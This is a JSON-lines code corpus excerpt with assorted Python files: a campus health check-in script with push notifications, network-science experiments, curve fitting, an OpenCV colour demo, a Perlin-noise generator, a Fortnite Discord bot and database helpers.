获取打卡时段\n def getSeq(self):\n seq = self.seq\n if seq == 1:\n return \"早打卡\"\n elif seq == 2:\n return \"午打卡\"\n elif seq == 3:\n return \"晚打卡\"\n else:\n return \"非打卡时段\"\n \n # 获取打卡结果\n def getResult(self):\n res = self.status_code\n if res == 1:\n return \"✅ 打卡成功\"\n elif res == 2:\n return \"✅ 你已经打过卡了,无需重复打卡\"\n elif res == 3:\n return \"❌ 打卡失败,当前不在打卡时间段内\"\n elif res == 4:\n return \"❌ 打卡失败,jwsession 无效\" \n elif res == 5:\n return \"❌ 打卡失败,登录错误,请检查账号信息\"\n else:\n return \"❌ 打卡失败,发生未知错误,请检查日志\"\n\n # 推送打卡结果\n def sendNotification(self):\n notifyTime = utils.getCurrentTime()\n notifyResult = self.getResult()\n notifySeq = self.getSeq()\n\n if os.environ.get('SCT_KEY'):\n # serverchan 推送\n notifyToken = os.environ['SCT_KEY']\n url = \"https://sctapi.ftqq.com/{}.send\"\n body = {\n \"title\": \"⏰ 我在校园打卡结果通知\",\n \"desp\": \"打卡项目:日检日报\\n\\n打卡情况:{}\\n\\n打卡时段:{}\\n\\n打卡时间:{}\".format(notifyResult, notifySeq, notifyTime)\n }\n requests.post(url.format(notifyToken), data=body)\n print(\"消息经Serverchan-Turbo推送成功\")\n if os.environ.get('PUSHPLUS_TOKEN'):\n # pushplus 推送\n url = 'http://www.pushplus.plus/send'\n notifyToken = os.environ['PUSHPLUS_TOKEN']\n content = json.dumps({\n \"打卡项目\": \"日检日报\",\n \"打卡情况\": notifyResult,\n \"打卡时段\": notifySeq,\n \"打卡时间\": notifyTime\n }, ensure_ascii=False)\n msg = {\n \"token\": notifyToken,\n \"title\": \"⏰ 我在校园打卡结果通知\",\n \"content\": content,\n \"template\": \"json\"\n }\n requests.post(url, data=msg)\n print(\"消息经pushplus推送成功\")\n if os.environ.get('BARK_TOKEN'):\n # bark 推送\n notifyToken = os.environ['BARK_TOKEN']\n req = \"{}/{}/{}\".format(notifyToken, \"⏰ 我在校园打卡(日检日报)结果通知\", notifyResult)\n requests.get(req)\n print(\"消息经bark推送成功\")\n if os.environ.get(\"MIAO_CODE\"):\n baseurl = \"https://miaotixing.com/trigger\"\n body = {\n \"id\": os.environ['MIAO_CODE'],\n \"text\": \"打卡项目:日检日报\\n\\n打卡情况:{}\\n\\n打卡时段:{}\\n\\n打卡时间:{}\".format(notifyResult, notifySeq, notifyTime)\n }\n requests.post(baseurl, data=body)\n print(\"消息经喵推送推送成功\")\n\n\nif __name__ == '__main__':\n # 找不到cache,登录+打卡\n wzxy = WoZaiXiaoYuanPuncher()\n if not os.path.exists('.cache'):\n print(\"找不到cache文件,正在使用账号信息登录...\")\n loginStatus = wzxy.login()\n if loginStatus:\n wzxy.PunchIn()\n else:\n print(\"登陆失败,请检查账号信息\")\n else:\n print(\"找到cache文件,尝试使用jwsession打卡...\")\n wzxy.PunchIn()\n wzxy.sendNotification()","sub_path":"wzxy-dailyreport.py","file_name":"wzxy-dailyreport.py","file_ext":"py","file_size_in_byte":9937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"141303749","text":"import networkx as nx\nimport matplotlib.pyplot as plt\nimport random\nimport numpy as np\nimport time\nimport math\nfrom bisect import bisect_left\nfrom datetime import datetime\nfrom sklearn.linear_model import LinearRegression\n\n### To run the experiments\n# a) Change input_type_num variable below\n# b1) For real graph change filename in experiment_file() function\n# b2) For BA model change parameters in experiment_ba() function\n# b3) For TC model change parameters in experiment_triadic() function\n# focus_indices array allows to record trajectory of nodes with selected indices, i.e [10, 50, 100, 1000]\n# To average results go to process_output.py\n# To calculate ratio of friendship paradox go to analyze_hist.py\n# hist_ files contain histograms on linear and log-log scale as well as linreg approximation\n# out_ files contain raw results for nodes in focus_indices array\n# please, do not rename output files for further processing to avoid errors\n\n# Works on Python 3.7.6\n### Full instructions in Readme.md\n\n\ninput_types = [\"from_file\", \"barabasi-albert\", \"triadic\", \"test\"]\n# Change value below to run experiment\ninput_type_num = 2\n\ndef get_neighbor_summary_degree(graph, node):\n neighbors_of_node = graph.neighbors(node)\n acc = 0\n for neighbor in neighbors_of_node:\n acc += graph.degree(neighbor)\n return acc\n\n\ndef get_neighbor_average_degree(graph, node, si=None):\n if not si:\n si = get_neighbor_summary_degree(graph, node)\n return si / graph.degree(node)\n\n\ndef get_friendship_index(graph, node, ai=None):\n if not ai:\n ai = get_neighbor_average_degree(graph, node)\n return ai / graph.degree(node)\n\n\n# Acquires histograms for friendship index \ndef analyze_fi_graph(graph, filename):\n graph_nodes = graph.nodes()\n\n # b (beta) = friendship index \n maxb = 0\n bs = []\n # get all values of friendship index\n for node in graph_nodes:\n new_b = get_friendship_index(graph, node)\n if new_b > maxb:\n maxb = new_b\n bs.append(new_b)\n \n # n=values, bins=edges of bins\n n, bins, _ = plt.hist(bs, bins=range(int(maxb)), rwidth=0.85)\n\n # leave only non-zero\n n_bins = zip(n, bins)\n n_bins = list(filter(lambda x: x[0] > 0, n_bins))\n n, bins = [ a for (a,b) in n_bins ], [ b for (a,b) in n_bins ]\n \n # get log-log scale distribution\n lnt, lnb = [], []\n for i in range(len(bins) - 1):\n if (n[i] != 0):\n lnt.append(math.log(bins[i+1]))\n lnb.append(math.log(n[i]) if n[i] != 0 else 0)\n\n # prepare for linear regression\n np_lnt = np.array(lnt).reshape(-1, 1)\n np_lnb = np.array(lnb)\n\n # linear regression to get power law exponent\n model = LinearRegression()\n model.fit(np_lnt, np_lnb)\n linreg_predict = model.predict(np_lnt)\n\n [directory, filename] = filename.split('/')\n f = open(directory + \"/hist_\" + filename, \"w\")\n f.write(\"t\\tb\\tlnt\\tlnb\\tlinreg\\t k=\" + str(model.coef_) + \", b=\" + str(model.intercept_) + \"\\n\")\n\n for i in range(len(lnb)):\n f.write(str(bins[i]) + \"\\t\" + str(int(n[i])) + \"\\t\" + str(lnt[i]) + \"\\t\" + str(lnb[i]) + \"\\t\" + str(linreg_predict[i]) + \"\\n\")\n f.close()\n\n\n# 0 - From file\ndef experiment_file():\n filename = \"phonecalls.edgelist.txt\"\n graph = nx.read_edgelist(filename)\n analyze_fi_graph(graph, filename)\n \n\n# 1 Barabasi-Albert\ndef create_ba(n, m, focus_indices):\n G = nx.complete_graph(m)\n\n # get node statistics\n s_a_b_focus = []\n for focus_ind in focus_indices:\n s_a_b_focus.append(([], [], []))\n\n for k in range(m, n + 1):\n deg = dict(G.degree) \n G.add_node(k) \n \n vertex = list(deg.keys()) \n weights = list(deg.values())\n\n # preferential attachment \n nodes_to_connect = random.choices(vertex, weights, k=m) \n for node in nodes_to_connect: # TODO: same node twice\n G.add_edge(k, node)\n\n # save focus node statistics\n if k % 50 == 0:\n for i in range(len(s_a_b_focus)):\n s_a_b = s_a_b_focus[i]\n focus_ind = focus_indices[i]\n if focus_ind < k:\n si = get_neighbor_summary_degree(G, focus_ind)\n ai = get_neighbor_average_degree(G, focus_ind, si)\n bi = get_friendship_index(G, focus_ind, ai)\n s_a_b[0].append(si)\n s_a_b[1].append(round(ai, 4))\n s_a_b[2].append(round(bi, 4))\n\n\n should_plot = False\n if should_plot:\n s_a_b = s_a_b_focus[0]\n s_focus_xrange = [x / len(s_a_b[0]) for x in range(len(s_a_b[0]))]\n plt.plot(s_focus_xrange, s_a_b[0])\n plt.show()\n s_focus_xrange = [x / len(s_a_b[1]) for x in range(len(s_a_b[1]))]\n plt.plot(s_focus_xrange, s_a_b[1])\n plt.show()\n s_focus_xrange = [x / len(s_a_b[2]) for x in range(len(s_a_b[2]))]\n plt.plot(s_focus_xrange, s_a_b[2])\n plt.show()\n\n #print(G.degree)\n return (G, s_a_b_focus)\n\n\ndef experiment_ba():\n ### Change these parameters ###\n n = 10000\n m = 3\n number_of_experiments = 3\n focus_indices = [50, 100]\n ### \n filename = f\"output/out_ba_{n}_{m}\"\n\n start_time = time.time()\n now = datetime.now()\n should_write = True\n if should_write:\n files = []\n for ind in focus_indices:\n f_s = open(f\"{filename}_{ind}_s.txt\", \"a\")\n f_a = open(f\"{filename}_{ind}_a.txt\", \"a\")\n f_b = open(f\"{filename}_{ind}_b.txt\", \"a\")\n files.append((f_s, f_a, f_b))\n now = datetime.now()\n for i in range(len(focus_indices)):\n for f in files[i]:\n f.write(\"> n=\" + str(n) + \" m=\" + str(m) + \" \" + now.strftime(\"%d/%m/%Y %H:%M:%S\") + \"\\n\")\n for _ in range(number_of_experiments):\n graph, result = create_ba(n, m, focus_indices)\n for i in range(len(focus_indices)):\n for j in range(len(result[i])):\n files[i][j].write(\" \".join(str(x) for x in result[i][j]) + \"\\n\")\n analyze_fi_graph(graph, filename + \".txt\")\n else:\n graph, result = create_ba(n, m, focus_indices)\n #analyze_fi_graph(graph, \"test.txt\")\n print((\"Elapsed time: %s\", time.time() - start_time))\n \n\n# 2 Triadic Closure\ndef create_triadic(n, m, p, focus_indices):\n G = nx.complete_graph(m)\n\n s_a_b_focus = []\n for focus_ind in focus_indices:\n s_a_b_focus.append(([], [], []))\n\n # k - index of added node\n for k in range(m, n + 1):\n deg = dict(G.degree) \n G.add_node(k) \n \n vertex = list(deg.keys()) \n weights = list(deg.values())\n \n [j] = random.choices(range(0, k), weights) # choose first node\n j1 = vertex[j]\n del vertex[j]\n del weights[j]\n\n lenP1 = k - 1 # length of list of vertices \n\n vertex1 = G[j1]\n lenP2 = len(vertex1)\n \n numEdj = m - 1 # number of additional edges\n\n if numEdj > lenP1: # not more than size of the graph\n numEdj = lenP1\n\n randNums = np.random.rand(numEdj) # list of random numbers\n neibCount = np.count_nonzero(randNums <= p) # number of elements less or equal than p\n # which is equal to the number of nodes adjacent to j, which should be connected to k\n if neibCount > lenP2 : # not more than neighbors of j\n neibCount = lenP2 \n vertCount = numEdj - neibCount # number of arbitrary nodes of the graph to connect with k\n\n neibours = random.sample(list(vertex1), neibCount) # список вершин из соседних\n \n G.add_edge(j1, k)\n\n for i in neibours:\n G.add_edge(i, k)\n j = vertex.index(i) # index of i in the list of all vertices\n del vertex[j] # delete i and its weight from lists\n del weights [j]\n lenP1 -= 1\n\n for _ in range(0, vertCount):\n [i] = random.choices(range(0, lenP1), weights)\n G.add_edge(vertex[i], k)\n del vertex[i]\n del weights[i]\n lenP1 -= 1\n\n\n # save focus node statistics\n if k % 50 == 0:\n for i in range(len(s_a_b_focus)):\n s_a_b = s_a_b_focus[i]\n focus_ind = focus_indices[i]\n if focus_ind < k:\n si = get_neighbor_summary_degree(G, focus_ind)\n ai = get_neighbor_average_degree(G, focus_ind, si)\n bi = get_friendship_index(G, focus_ind, ai)\n s_a_b[0].append(si)\n s_a_b[1].append(round(ai, 4))\n s_a_b[2].append(round(bi, 4))\n\n\n should_plot = False\n if should_plot:\n s_a_b = s_a_b_focus[0]\n s_focus_xrange = [x / len(s_a_b[0]) for x in range(len(s_a_b[0]))]\n plt.plot(s_focus_xrange, s_a_b[0])\n plt.show()\n s_focus_xrange = [x / len(s_a_b[1]) for x in range(len(s_a_b[1]))]\n plt.plot(s_focus_xrange, s_a_b[1])\n plt.show()\n s_focus_xrange = [x / len(s_a_b[2]) for x in range(len(s_a_b[2]))]\n plt.plot(s_focus_xrange, s_a_b[2])\n plt.show()\n\n return (G, s_a_b_focus)\n\n\ndef experiment_triadic():\n n = 10000\n m = 3\n p = 0.75\n number_of_experiments = 3\n focus_indices = [10, 50, 100]\n filename = f\"output/out_tri_{n}_{m}_{p}\"\n\n should_write = True\n if should_write:\n files = []\n for ind in focus_indices:\n f_s = open(f\"{filename}_{ind}_s.txt\", \"a\")\n f_a = open(f\"{filename}_{ind}_a.txt\", \"a\")\n f_b = open(f\"{filename}_{ind}_b.txt\", \"a\")\n files.append((f_s, f_a, f_b))\n now = datetime.now()\n start_time = time.time()\n for i in range(len(focus_indices)):\n for f in files[i]:\n f.write(\"> n=\" + str(n) + \" m=\" + str(m) + \" \" + now.strftime(\"%d/%m/%Y %H:%M:%S\") + \"\\n\")\n for _ in range(number_of_experiments):\n graph, result = create_triadic(n, m, p, focus_indices)\n for i in range(len(focus_indices)):\n for j in range(len(result[i])):\n files[i][j].write(\" \".join(str(x) for x in result[i][j]) + \"\\n\")\n analyze_fi_graph(graph, filename + \".txt\")\n print((\"Elapsed time: %s\", time.time() - start_time))\n else:\n graph, result = create_triadic(n, m, p, focus_indices)\n analyze_fi_graph(graph, \"test.txt\")\n \n\n# 3 Test data\ndef print_node_values(graph, node_i):\n print(\"Summary degree of neighbors of node %s (si) is %s\" % (node_i, get_neighbor_summary_degree(graph, node_i)))\n print(\"Average degree of neighbors of node %s (ai) is %s\" % (node_i, get_neighbor_average_degree(graph, node_i)))\n print(\"Friendship index of node %s (bi) is %s\" % (node_i, get_friendship_index(graph, node_i)))\n\n\ndef experiment_test():\n filename = \"test_graph.txt\"\n\n graph = nx.read_edgelist(filename)\n print_node_values(graph, '1')\n \n nx.draw(graph, with_labels=True)\n plt.show()\n\n\nif __name__ == \"__main__\":\n input_type = input_types[input_type_num]\n print(\"Doing %s experiment\" % input_type)\n if input_type == \"from_file\":\n experiment_file()\n elif input_type == \"barabasi-albert\":\n experiment_ba()\n elif input_type == \"triadic\":\n experiment_triadic()\n elif input_type == \"test\":\n experiment_test()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"352442608","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom scipy.optimize import minimize, minimize_scalar\nfrom sklearn.metrics import mean_absolute_error, mean_squared_error, max_error\n\ndef MAE(y, pred):\n return np.mean(abs(y-pred))\n\n\ndef k1(T, c1, c2, n):\n return c1 * c2 * (T**n) / (c2 + c1 * (T**n))\n\ndef k2(T, c3, c4):\n return c3*np.exp(-1 * c4 / T)\n\ndef f_k(T, c1, c2, n, c3, c4):\n return k1(T, c1, c2, n) + k2(T, c3, c4)\n\ndef open_file(path):\n with open(path, 'r') as f:\n data_raw = f.readlines()\n data_raw = [d.replace(' ', '\\t').replace('\\n', '') for d in data_raw]\n data = [d.split('\\t') for d in data_raw]\n data = pd.DataFrame(data[1:], columns=['T', 'k'])\n return data\n\ndef preprocess(data):\n for c in data.columns:\n data[c] = data[c].astype('float')\n data['T_log'] = np.log(data['T'])\n data['k_log'] = np.log(data['k'])\n return data\n\ndef ploynomal_fit(data):\n z = np.polyfit(data['T_log'], data['k_log'], 7)\n p = np.poly1d(z)\n return p\n\ndef interpolate(p, min, max):\n xp = np.linspace(min, max, 200)\n ap_df = pd.DataFrame({'x': xp})\n ap_df['y'] = [p(x) for x in xp]\n return ap_df\n\ndef find_bend_points(p):\n p3 = np.polyder(p, m=3)\n roots = np.roots(p3)\n return sorted([x for x in roots if (np.exp(x)>2) and (np.exp(x)<=70)])\n\ndef refine_palteue(interp_df, bent_pts):\n plateue = interp_df[(interp_df['x'] > bent_pts[0]) & (interp_df['x'] < bent_pts[1])]\n plateue['ae'] = plateue['y'].apply(lambda x: plateue['y'].mean() - x)\n var = np.var(plateue['ae'])\n plateue = plateue[plateue['ae'].abs() < 3*var]\n return plateue[['x', 'y']].apply(lambda x: np.exp(x))\n\n\ndef approximate(data):\n data = preprocess(data)\n polynom = ploynomal_fit(data)\n\n interp_df_log = interpolate(polynom, data['T_log'].min(), np.log(120))#data['T_log'].max())\n\n T = np.exp(interp_df_log['x'])\n k = np.exp(interp_df_log['y'])\n k_max = k.max()\n k = k / k_max\n\n perc_25 = int(len(k)*0.25)\n perc_50 = int(len(k)*0.5)\n perc_75 = int(len(k)*0.75)\n\n def loss_k(*params):\n c1 = params[0][0]\n c2 = params[0][1]\n n = params[0][2]\n c3 = params[0][3]\n c4 = params[0][4]\n k_fit = f_k(T, c1, c2, n, c3, c4)\n\n return 1.5*MAE(k[:perc_25], k_fit[:perc_25])+\\\n 1.2*MAE(k[perc_25:perc_50], k_fit[perc_25:perc_50])+\\\n MAE(k[perc_50:perc_75], k_fit[perc_50:perc_75])+\\\n MAE(k[perc_75:], k_fit[perc_75:])\n\n params = minimize(loss_k, (0.5, 0.2, 1, 2, 15),\n method='SLSQP',\n tol=1e-10,\n options={'maxiter': 10000}\n )\n c1, c2, n, c3, c4 = tuple(params.x.tolist())\n return c1, c2, n, c3, c4, k_max\n\nif __name__ == \"__main__\":\n p = '/home/quantum/Documents/iltpe/Cu10Zn2Sb4S13.dat'\n p = '/home/quantum/Documents/iltpe/PMMA.dat'\n # p = '/home/quantum/Documents/iltpe/SiO2Damon1973.txt'\n data = open_file(p)\n T = data['T'].astype('float')\n c1, c2, n, c3, c4 = approximate(data)\n print('C1 {}, C2 {}, N {}, C3 {}, C4 {}'.format(c1, c2, n, c3, c4))\n\n k_fit = k1(T, c1, c2, n) + k2(T, c3, c4)\n\n plt.scatter(data['T'], data['k'], color='g')\n plt.plot(T, k_fit)\n plt.yscale('log')\n plt.xscale('log')","sub_path":"k_fit_all.py","file_name":"k_fit_all.py","file_ext":"py","file_size_in_byte":3341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"561331869","text":"\"\"\"Helper files for pipeline fastqc steps.\n\n\"\"\"\n\nimport os\n\nfrom ccrngspy import utils\n\nlogger = utils.make_local_logger(\"RUM helper logging\", level=\"debug\", color=\"green\")\n\ndef make_rum_param_list(samples, config, params=None):\n \"\"\"Helper function to turn the sample file into a list of files.\n\n Needs to be a list of [[input1, input2], output, params]; for the fastqc script.\n\n The output is the file RUM.sam.\n\n while the params are taken from the global opts variable\n (and possibly from the YAML config file).\n \n \"\"\"\n\n final_list = []\n\n fastq_dir = config['general_params']['fastq_input_dir']\n log_dir = config['general_params']['log_file_dir']\n rum_dir = config['rum_params']['output_dir']\n\n \n for sample in samples:\n params = dict(sample=sample['samplename'])\n \n tmp = [[os.path.join(fastq_dir, sample['filename1']),\n os.path.join(fastq_dir, sample['filename2'])],\n os.path.join(rum_dir, sample['samplename'], \"RUM.sam\"),\n params]\n \n final_list.append(tmp)\n\n return final_list\n","sub_path":"ccrngspy/ccrngspy/pipeline/rum_helpers.py","file_name":"rum_helpers.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"107474260","text":"#https://www.hackerrank.com/challenges/game-of-thrones/submissions/code/13996049\r\nstring = raw_input()\r\ndistalph=list(set(list(string)))\r\ndict1={}\r\nfor char in distalph:\r\n cnt=0\r\n cnt=list(string).count(char)\r\n dict1[char]=cnt\r\nodds=0\r\nevens=0\r\nfor key in dict1:\r\n if dict1[key]%2==0:\r\n evens=evens+1\r\n else:\r\n odds=odds+1\r\n\r\nif odds>1:\r\n found = False\r\nelse:\r\n found = True\r\n# Write the code to find the required palindrome and then assign the variable 'found' a value of True or False\r\n\r\nif not found:\r\n print(\"NO\")\r\nelse:\r\n print(\"YES\")\r\n","sub_path":"GameofThronesI.py","file_name":"GameofThronesI.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"402557275","text":"#TerribleTicTacs-Dennis Chen && Britni Canale\r\n#SoftDev1 pd 6\r\n#K16: No Trouble\r\n#10/4/18\r\n\r\nimport sqlite3\r\nimport csv\r\n\r\n\r\n#========Initializing Files========\r\n\r\nDB_FILE=\"database.db\"\r\ndb = sqlite3.connect(DB_FILE)\r\nc = db.cursor() #allows sqlite to be used on database.db\r\n\r\n\r\n#==========Function for making a table from csv==========\r\n\r\ndef makeTable(filename):\r\n with open(filename, 'r') as csvfile: #opens database\r\n reader = csv.DictReader(csvfile) #creates sequence of dictionaries\r\n num = 0 #used to determine if row is first row\r\n col1 = \"\" #initializes column strings\r\n col2 = \"\"\r\n col3 = \"\"\r\n for row in reader: #goes through each row, adds to table\r\n if num == 0: #if row is first row, names columns based on csv file, uses list of keys to access header names\r\n col1 = list(row.keys())[0] \r\n col2 = list(row.keys())[1]\r\n col3 = list(row.keys())[2]\r\n c.execute(\"CREATE TABLE \" + filename[0:-4] + \"(\" +col1+ \" TEXT, \" + col2+ \" INTEGER, \" +col3+\" INTEGER)\") #creates table\r\n num = num + 1 #increments to indicate first row has been passed\r\n params = (row[col1],row[col2],row[col3]) #creates params for values using row dictionary and column names \r\n c.execute(\"INSERT INTO \" + filename[0:-4] + \" VALUES(?, ?, ?)\", params) #inserts values in each row into the table\r\n\r\n\r\n#==================Calling functions for file names used, saving changes=====================\r\n\r\n\r\nmakeTable(\"courses.csv\")\r\nmakeTable(\"peeps.csv\")\r\ndb.commit() #save changes\r\ndb.close() #close database\r\n","sub_path":"16_csv2db/TerribleTicTacs_ChenD_CanaleB.py","file_name":"TerribleTicTacs_ChenD_CanaleB.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"578223523","text":"import discord\nimport config\nfrom api import fortnite_api as api\nfrom discord.ext import commands\n\nclass Fortnite():\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(pass_context=True)\n async def stats(self, ctx, *args):\n \"\"\" Get fortnite stats via API \"\"\"\n gamertag = ' '.join(args)\n embed_lifetime = discord.Embed(colour = discord.Colour.blue())\n embed_current_season = discord.Embed(colour = discord.Colour.purple())\n\n try:\n lifetime_stats = api.get_lifetime_stats(gamertag)\n current_season_stats = api.get_current_season_stats(gamertag)\n except:\n if not gamertag:\n await self.bot.say('Skriv `.stats [gamertag]` for å se oversikt.')\n else:\n await self.bot.say(f'Finner ingen profil med gamertaggen `{gamertag}`')\n return\n\n for title, stat in lifetime_stats.items():\n embed_lifetime.add_field(name=title, value=stat, inline=True)\n\n for title, stat in current_season_stats.items():\n embed_current_season.add_field(name=title, value=stat, inline=True)\n \n await self.bot.say(f'Her er en total oversikt over `{gamertag}` siden Season 1:', embed=embed_lifetime)\n await self.bot.say(f'Her er en oversikt over `{gamertag}` for Season {config.current_season}:', embed=embed_current_season)\n \n @commands.command()\n async def store(self):\n store = []\n rarity = {'Fine': 0xffa31a, 'Quality': 0xd11aff, 'Sturdy': 0x0066ff, 'Handmade': 0x00cc00}\n\n try:\n store = api.get_store()\n except:\n await self.bot.say('Klarte ikke hente shoppen. Prøv igjen senere.')\n return\n \n for item in store:\n e = discord.Embed(title=item['name'], description=f\"{item['vBucks']} vBucks\", colour=rarity[item['rarity']])\n e.set_thumbnail(url=item['imageUrl'])\n await self.bot.say(embed=e)\n\n\ndef setup(bot):\n bot.add_cog(Fortnite(bot))\n","sub_path":"fortnite.py","file_name":"fortnite.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"379882663","text":"# coding=utf-8\nimport cv2\nimport numpy as np\n\ndef nothing(x):\n pass\n\ncap = cv2.VideoCapture(0)\n\ncv2.namedWindow('image')\ncv2.createTrackbar('hmin', 'image', 0, 255, nothing)\ncv2.createTrackbar('smin', 'image', 0, 255, nothing)\ncv2.createTrackbar('vmin', 'image', 0, 255, nothing)\ncv2.createTrackbar('hmax', 'image', 0, 180, nothing)\nswitch = '0:OFF\\n1:ON'\ncv2.createTrackbar(switch, 'image', 0, 1, nothing)\n\nwhile(True):\n # Capture frame-by-frame\n ret, frame = cap.read()\n\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n\n hmin = cv2.getTrackbarPos('hmin', 'image')\n smin = cv2.getTrackbarPos('smin', 'image')\n vmin = cv2.getTrackbarPos('vmin', 'image')\n hmax = cv2.getTrackbarPos('hmax', 'image')\n s = cv2.getTrackbarPos(switch, 'image')\n\n # 设定橙色的阈值\n lower_orange = np.array([hmin, smin, vmin])\n upper_orange = np.array([hmax, 255, 255])\n # 根据阈值构建掩模\n mask = cv2.inRange(hsv, lower_orange, upper_orange)\n\n # 对原图像和掩模进行位运算\n res = cv2.bitwise_and(frame, frame, mask=mask)\n # 显示图像\n cv2.imshow('frame', frame)\n cv2.imshow('mask', mask)\n cv2.imshow('res', res)\n\n # edges = cv2.Canny(img, minVal_1, maxVal_1)\n # cv2.imshow('edges', edges)\n k = cv2.waitKey(1) & 0xFF\n if k == 27:\n break","sub_path":"past/patio2_test1_7_video_capture_color_hsv.py","file_name":"patio2_test1_7_video_capture_color_hsv.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"524066789","text":"from numpy import *\nfrom numpy import matlib\nfrom tkinter import *\nfrom matplotlib import pyplot as plt\nimport matplotlib\nfrom PIL import Image, ImageTk\nfrom scipy import misc\nfrom scipy.interpolate import interp2d\nimport skimage\n#from colormap import Colormap\nimport numpy as np\nplt.ion()\n\ndef get_background(size=(1000,1000)):\n\n size_x=size[0]\n size_y=size[1]\n size_turb_x=size[0]\n size_turb_y=size[1]\n lambdax = 8\n lambday = 400\n xpower = 400\n ypower = 500\n\n a=0\n l=0\n\n fig=plt.figure()\n\n while l<2 :\n mat0=random.rand(size_turb_x,size_turb_x)\n x0=arange(size_turb_x)\n y0=arange(size_turb_x)\n grids=[]\n pts=vstack((x0,y0))\n\n for j in arange(1,7,1) :\n i=2**j\n x1=arange(0,size_turb_x,i)\n y1=arange(0,size_turb_x,i)\n f = interp2d(x0, y0, mat0)\n grid_z1=f(x1,y1)\n grids.append(grid_z1)\n per=1\n perlin_mat=empty((size_turb_x,size_turb_x))\n\n for mat in grids :\n mat=skimage.transform.resize(mat,(size_turb_x,size_turb_x))\n per=per/0.7\n perlin_mat = perlin_mat + mat*per\n perlin_mat=perlin_mat/amax(perlin_mat)\n perlin_cut=perlin_mat.copy()\n l=l+1\n perlin_cut=skimage.transform.resize(perlin_cut,(size_y,size_x))\n perlin_cut=perlin_cut/amax(perlin_cut)\n\n if a == 0 :\n turb_x0=perlin_cut\n a=1\n else :\n turb_y0=perlin_cut\n\n x0=arange(size_x)\n y0=arange(size_y)\n X,Y=meshgrid(x0,y0)\n #mat0=np.sin(((X+turb_x0*xpower)/lambdax)*2*pi)\n mat0=(((X+turb_x0*xpower)/lambdax)*sin(((Y+turb_y0*ypower)/lambday)*2*pi))**2\n cmap = matplotlib.colors.LinearSegmentedColormap.from_list(\"\", [\"gray\",\"black\"])\n\n im_plt = plt.imshow(mat0,cmap=cmap)\n image = Image.fromarray(np.uint8( im_plt.get_cmap()(im_plt.get_array())*255))\n im = ImageTk.PhotoImage('RGB', image.size)\n im.paste(image)\n plt.pause(60)\n# plt.close(fig)\n return im\n\n\nif __name__ == '__main__':\n\n im_plt = get_background()\n\n\n","sub_path":"PerlinNoiseGeneration/mountain/woodenbackground.py","file_name":"woodenbackground.py","file_ext":"py","file_size_in_byte":2089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"176997497","text":"#!/usr/bin/env python\n#-*-encoding:utf-8-*-\n\n__author__ = 'shouke'\n\nfrom common.log import logger\n\n\nclass TestReport:\n def __init__(self, db):\n self.db = db\n\n def get_case_num_by_run_result(self, execution_num, plan_id, status):\n logger.info('正在查询运行状态为:%s的用例记录数' % status)\n query = \"SELECT COUNT(id) FROM `website_ui_test_report_for_case` WHERE run_result = '%s' and plan_id = %s AND execution_num =%s\"\n data = (status,plan_id, execution_num)\n result = self.db.select_one_record(query, data)\n if result[0] and result[1]:\n case_num = result[1][0]\n return case_num\n elif result[0] and not result[1]:\n logger.error('未查询到运行状态为:%s的用例' % status)\n return 0\n else:\n logger.error('查询状态为%s用例数出错:%s,退出程序' % result[1])\n exit(1)\n\n def insert_report_for_summary(self, data):\n insert_query = \"INSERT INTO `website_ui_test_report_for_summary`\" \\\n \"(execution_num, project_id, plan_id, project_name, plan_name, browser,\" \\\n \"start_time, end_time, time_took, case_total_num, case_pass_num, case_fail_num, case_block_num, remark) \" \\\n \"VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s,%s, %s, %s, %s)\"\n result = self.db.execute_insert(insert_query, data)\n if not result[0]:\n logger.error('往测试报告-测试概况插入运行记录失败:%s,提前退出程序' % result[1])\n exit(1)\n\n def update_report_for_summary(self, data):\n update_query = \"UPDATE `website_ui_test_report_for_summary` SET end_time='%s', time_took='%s', \" \\\n \"case_total_num=%s, case_pass_num=%s, case_fail_num=%s, case_block_num=%s, remark='%s' WHERE execution_num='%s' AND plan_id=%s\"\n result = self.db.execute_update(update_query, data)\n if not result[0]:\n logger.error('更新测试报告-测试概况表失败:%s,即将退出程序' % result[1])\n exit(1)\n\n def insert_report_for_case(self, data):\n insert_query = \"INSERT INTO `website_ui_test_report_for_case`\" \\\n \"(execution_num, plan_id, case_id, case_path, case_name, run_result, remark, run_time, time_took) \" \\\n \"VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s)\"\n result = self.db.execute_insert(insert_query, data)\n if not result[0]:\n logger.error('往测试报告-测试用例执行明细表插入运行记录失败:%s,提前退出程序' % result[1])\n exit(1)\n\n\n def insert_report_for_case_step(self, data):\n insert_query = \"INSERT INTO `website_ui_test_report_for_case_step`(execution_num, plan_id, case_id, step_id, `order`, page, object, exec_operation, input_params, \" \\\n \"output_params, assert_type, check_pattern, run_times, try_for_failure, run_result, remark, run_time, run_id) \" \\\n \"VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\n result = self.db.execute_insert(insert_query, data)\n if not result[0]:\n logger.error('往测试报告-测试用例步骤执行明细表插入运行记录失败:%s,提前退出程序' % result[1])\n 